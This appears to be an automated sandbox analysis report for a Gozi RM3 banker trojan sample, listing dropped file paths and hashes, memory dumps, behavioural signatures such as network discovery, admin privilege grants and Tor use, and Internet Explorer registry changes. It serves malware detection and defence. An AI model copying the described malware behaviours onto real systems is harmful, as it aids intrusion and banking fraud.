C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d61c2a7edf4b81f7be45de1e33d9fb64
SHA1 505daf37edd55e9efe6ad032662bfdaaa788651c
SHA256 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d
SHA512 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3

memory/844-91-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

memory/844-92-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/844-93-0x0000000002690000-0x0000000002692000-memory.dmp

memory/844-94-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/844-95-0x0000000002692000-0x0000000002694000-memory.dmp

memory/844-96-0x0000000002694000-0x0000000002697000-memory.dmp

memory/844-97-0x000000000269B000-0x00000000026BA000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline

MD5 1f137f80c2a51641b19c6ab62739c7c7
SHA1 780317fa83c473a066a2b950440cc487c922e793
SHA256 e8e9879453ff3967159dae041ea0269c2de114e6aeb7946098e332b7ff36854e
SHA512 4f8ee12f4ba7d25f2684a4ca844573366af8c7bbb811171178fff1f47643233311697f27c5bc8839ce230757bab3dcf7ae59163a280a63ccb7bb99cc7b927374

\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

\??\c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp

MD5 00ab387cf5240f9e079347f0fc570b9d
SHA1 0158ed109b684079468cd3c3e46baec04e623a3c
SHA256 65cae3a9bffd254b5f9246019f3cbd0bc0fc5df4bbeb4930d28912bdf030f5c9
SHA512 1c3c00836c38e1b96314f2ae1aabfa3de362acedc035b74a2f314d347b1389e1011a33c47f67812f5a84d5a549ca31793b871996347d0b80c698feca0e46bce2

C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp

MD5 b56a0bebf61835e3f214da735ae84bf4
SHA1 040276c15a8a87684e1ec3abd39997c9aba75114
SHA256 8b016763de40b335e30228711944cf55dcc6456fc3d810f9ed97a7074c3baeeb
SHA512 7d32dc5daa6a6b0ae389bfad8646563e694914afc36785a65247939b28420a7aacaf8e078301dbada943ae62da54dd88e99a225f1e7170838cfdee652fd10fea

C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.dll

MD5 3063266ffdcfe2c4a0939b06ea3717b4
SHA1 b94790c56db20b47ae1b6519a05417923c0efa42
SHA256 eeaefce42beb6ba7172bf5d75002ba232dd1e59daabc0fc1a43ce03f53b55b74
SHA512 b31d97e6b6cdb3604b519d9c554deaaaa295b437a212a489b6262d44b9c43ba20918d2ae4fc6c060e1652e6390fbeb2ab964c64be93a4e6894bd60fd0c74a717

C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.pdb

MD5 355cfdfd67fae9c87ea6e1a3955427ee
SHA1 88608dad2ee5c8bd4b6d65645571c76135d1d684
SHA256 95be07ab865d625257dd8669b2bf95e1cf7a73022b545082d37c1b50d509b647
SHA512 480cee09bb4440dda1e6ef244e0eb085dfaa44d7fcab65e067c8bde9fc8de2022d0b29d6407de358e1dd52aeb0c4bceb78fd30e15d625ee2c828f84288f2c787

\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline

MD5 d456f4da9b60e70744fc1d3492130437
SHA1 e721393fd973986ae5e965f2ced2506c54708e2e
SHA256 bbe537ea5aba3262de669dd6aba27be1e28707f046ade852a3a3082a19c0e541
SHA512 55930d623887eafbd93cfe8da972227bb4f159ecfc300562450f72974525193d65cefce6ac0d2e4b550e7e1c8b29192b24a622e98ffa563d33d987ad53737e7d

\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

\??\c:\Users\Admin\AppData\Local\Temp\CSC20.tmp

MD5 32ef79ada32c2c2aac964c292c338d9c
SHA1 a847f9e830ee32eb54aedae7a5a6152ffb78dd95
SHA256 dba94e58c55d3e1e42a2dcbe68fbd319702714e587ea8e19ef9427b9c1b740ee
SHA512 614c694b3bf0dc31b0b54072340c181cc710e9acd425c246eabe1dae05bb124d0413fbeed4541c60e434122e5302c1dbc1f104013f5ba596d0a0b1ddd76c6265

C:\Users\Admin\AppData\Local\Temp\RES21.tmp

MD5 367cc1ea803e51f6373873e2fae1b614
SHA1 0716aeb25b03d2039b52d4858a72dd1f30141d6e
SHA256 49d20edbe5ede206071a7071a93616ea281154046845f4a702eb42cb722de6a1
SHA512 e6bdbabc0c8dc0ad4f794e43abc72480cd9ab6c0d4636eedf48baf5661eb7d0a4a38878fb8322f23330f4b3314dcc44bb846cbc2ac351aa5704f156cad647799

C:\Users\Admin\AppData\Local\Temp\adua5uv0.dll

MD5 1128201d45c30519cccd84ddd9b0d894
SHA1 d505ec80cef79a255949c86c88f6d75770c1bbfd
SHA256 653dda67447686b2d7d6c91d0183920461fb38698d3a4cec849f71ecfa5ac302
SHA512 eb3835b33db10c7b29fe95b4857888fe5f08892a1fdc7c8552820e4db3230132880df06c5a6643d0024e36e4572faab92bcd06dd74fccf6d827297dfc88091df

C:\Users\Admin\AppData\Local\Temp\adua5uv0.pdb

MD5 8071cc09c71db6ec209768f4debc80ee
SHA1 4916a8d80d95e1cd4a505d8197cd42faca4ca8cf
SHA256 dd503ab6fceccddb655c51bb7d361cf7eb6cb0f91ab586f583b966f09b1a068f
SHA512 c2b07e16ab7fec5b02075c2aa5d731a038f447d2c4d0da35e84434234ed6a2533b70cc8e1883531f6edc912ad2a6b6d993e6a74df2b321ae8b153de46fc57b5c

memory/1292-110-0x000000001B660000-0x000000001B673000-memory.dmp

memory/304-111-0x00000000002D0000-0x0000000000311000-memory.dmp

memory/1368-112-0x00000000029B0000-0x00000000029C5000-memory.dmp

memory/1368-718-0x0000000002990000-0x00000000029A5000-memory.dmp

C:\Users\Admin\~Columnsoftware.DDF

MD5 3e25bda21d35fe79e726d526d9ceb030
SHA1 e9e8d6070068e019b5243b6cd4d5e24b12dd8796
SHA256 8f6e21ab45d1631d565b15bd8367d6a1702219c3c21d95200f7c2b37dd2d5a34
SHA512 6b48ef106bccf877635c496f7d25c72f75993311f7f1189e0437c16616b26c9d62c9dddd7f8962dd5bf349f6125f93c124376f634231ef768f56c5a0280c308e

C:\Users\Admin\~Columnsoftware_LAYOUT.INF

MD5 7aacfc1d6af97be98a41d4e8d7087332
SHA1 75770af6f11a2aed72c96d0996818fa6e3f0780d
SHA256 fef82285bf4b68a83b4a2d011a203e170be145ce850ec6cf6985616dbf61675c
SHA512 07ee854501c49af974691f261dc88a52074133ae33382f554b2e6c026fea3dd8778ba404780e4ea8c4089d70ae4d0e5a7ea66d70d08ab2bbdda292d4fdefd518

C:\Users\Admin\~Columnsoftware.RPT

MD5 93d6c414c2c5115499497110d7c4bb8e
SHA1 22b1c6cf1dbf3be56bd810c1306eec7dd930edb4
SHA256 085b77cd3e8eceae456842612c1aed3608b6332d0809dd1c2c24b0468f8926dd
SHA512 f746af12b5606bea7535482842bfb1e0513efdf999e7fa378e077eabe6bb69ac448aa5bfc2d7dacb54daf5903174f169fb082e9ddcfd210ff3220f9db5447fec

C:\Users\Admin\~Columnsoftware.CAB

MD5 3c234cb15748c957069af8ae2cc42039
SHA1 1d9faa7321914af5ad01e74ba6a3dd1a496cd68d
SHA256 fc7ade38fe0eaebfe886ff998593ee34f5d0d724274eb876ffb30d0f36807da1
SHA512 27cb59f24874705d9d7c8d080a58d5fb270c0ab34d435a81f6d13639807a4a08d665d4ba3076285c178d9d7cf78d897355660fac6db15e7ff29f5de837cf4222

C:\Users\Admin\AppData\Local\Temp\5BA0.bin0

MD5 768165e0abf16bf3056836d5431a7296
SHA1 9fb3196be60e49bfc319ebd9e0b103954d711e34
SHA256 b44c505b721e93e2a596577018cc65b993cd632b9fe7620a4b3db54031afff5d
SHA512 1250ec40ba20f39a5b9a3aafd45c63cb6f1bf48b89acce1f885470c936fb48a803081943c68458ba1adce92d5fe79d3e45682285f56ecb29884d41974269992d

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 5f5179cca63bdf7f82bf9868710984e7
SHA1 899dcdea948341125761e3b5a6c99a8e868eb937
SHA256 e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72
SHA512 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 5f5179cca63bdf7f82bf9868710984e7
SHA1 899dcdea948341125761e3b5a6c99a8e868eb937
SHA256 e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72
SHA512 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 f730411a9a43c7d05a451c3b646a4b86
SHA1 5f79b8f800b68fa4509f21a4ef3bf61922d515dc
SHA256 bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f
SHA512 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 f730411a9a43c7d05a451c3b646a4b86
SHA1 5f79b8f800b68fa4509f21a4ef3bf61922d515dc
SHA256 bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f
SHA512 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 77c4ec68d22d4a45b126647d83f0c387
SHA1 dd09bf1f2448a85096dc09c5b8305f25bd979f57
SHA256 f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6
SHA512 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 77c4ec68d22d4a45b126647d83f0c387
SHA1 dd09bf1f2448a85096dc09c5b8305f25bd979f57
SHA256 f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6
SHA512 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 50123f5383e92fb265949158b9972f0b
SHA1 d75e071a98c9ebdd48e70b0d4bef171d9df5611d
SHA256 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa
SHA512 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 50123f5383e92fb265949158b9972f0b
SHA1 d75e071a98c9ebdd48e70b0d4bef171d9df5611d
SHA256 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa
SHA512 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 cad53cca46626dd11590e9a0011847f0
SHA1 abeddf2e3e6b4e503281e152270c872ba2ad90af
SHA256 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2
SHA512 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 cad53cca46626dd11590e9a0011847f0
SHA1 abeddf2e3e6b4e503281e152270c872ba2ad90af
SHA256 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2
SHA512 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 893f8524287e635bc325c12517b1eca9
SHA1 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94
SHA256 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a
SHA512 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 893f8524287e635bc325c12517b1eca9
SHA1 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94
SHA256 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a
SHA512 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 01f148eb1c87e87e79f1cb57591e1f9e
SHA1 e1536cbec4ab23ba0b508a2799ccb9925088b8ab
SHA256 e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071
SHA512 ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 01f148eb1c87e87e79f1cb57591e1f9e
SHA1 e1536cbec4ab23ba0b508a2799ccb9925088b8ab
SHA256 e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071
SHA512 ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 1b0c5c633d5f11e84a546f436da6edfb
SHA1 6f68c61a04083147f97e0d09b2ae3ca3206afe8d
SHA256 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12
SHA512 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 1b0c5c633d5f11e84a546f436da6edfb
SHA1 6f68c61a04083147f97e0d09b2ae3ca3206afe8d
SHA256 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12
SHA512 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 348ea633774cdb59e525c1744df6608b
SHA1 f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d
SHA256 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de
SHA512 f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 348ea633774cdb59e525c1744df6608b
SHA1 f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d
SHA256 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de
SHA512 f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 69101071e1de615d8449b4a118d51e2e
SHA1 9a04639583310c6f0dbb15dcdcb81a480e54dd22
SHA256 c464da6490735ef3e20d33d4a4624af00bb3e3a942d6a588fcc618c5ec6e138e
SHA512 8a99c0d080af7cfdc2914840e6b36cf5dd706dcf0254c65347b3c5b10aefd2296529fdf3b5bf8ff00fab9331a06ce4a296e6bcf342fbe3ed1464d59b26665dd0

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 08:05

Reported

2022-03-15 08:35

Platform

win10v2004-en-20220113

Max time kernel

1696s

Max time network

1776s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Grants admin privileges

Uses Tor communications

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Restr.exe

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2317671783" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1064f97d4338d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000694908dbfb46b57cd6968555a943005e9119959593d00753b9321fd109749f6f000000000e8000000002000020000000bb00d8a1068d77372474e6e05666d87be8542d8d50dcfa6309fd3e30a23dcc6120000000bdd9b023ff3c8e96d682cc50e317e1622624ec1843c96d1648c5d9f55206baf84000000092099aac9dd1ede2d30e05180d80f415c8a1be5f00a5222873d56860a8a83c00fbf63ab02ece3f848ccc883fa7e0f00e778ae2c5406c37d5c1f8592155cdcf78 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000e326887780a1cc42463cf93e23f06042acd5c980d89817792e775c618e0d43b8000000000e800000000200002000000055abac4686cabcc75247a81859be176f7a560c2c5bfd9dda27ff2afd67379033c00000002ff4356701135e094e80d75fdaecb8ab772ee676e5e01642c2a33e9bbf7e50375c8ee026ab0ccedb8787c7227d038aa46a402eca5c23325f7a4a451fdf6550daef8010e84deb2c9233436cb973eef1bf3aee4f921b581c1a1a27ad861e06fe37e191674716cb4ba64c2b6cbb6a4ca3d6e00a03571ff046a6fb7ca87f8b162b50f986670d5dd33eabbebccd8d2078011006a75e6db928b405f228ed9e790a55394f4503bb8024ecc4a3c69714d843817dd540a43745fb7767daf7ee1ddc22443840000000d014b15674dd9636b3652290fec5ed434ee14b05cd1fd10a50f2a0a2459d7129398ae538fb5ae639fd49cf02f80b36dd2733af24d7c80a0f0f37a0be1badc496 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947395" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B5C4DBF1-A436-11EC-B9A4-4AFEF23D9694} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000008b909b8338d4738f4b3b2e4dcbe9cf0e2b037d12806396cf22528efc111641bb000000000e8000000002000020000000366574914b9a1bd144898af76963d69ad400b90ba988cc139251325775b3fe2d200000001129b6fe636ba60b01daa27e12b9ab8fdc1487eff7892c55d8b815f2cb97ee5440000000f7cdcb0ff5fdc78d44c377472c443e9f35b6f7984431996e83c3ea46c09db82d47785179d8f732a0b5ffafb83318a2edcf3f22a3964433b7815b60c96d4348bb C:\Program Files\Internet Explorer\iexplore.exe N/A
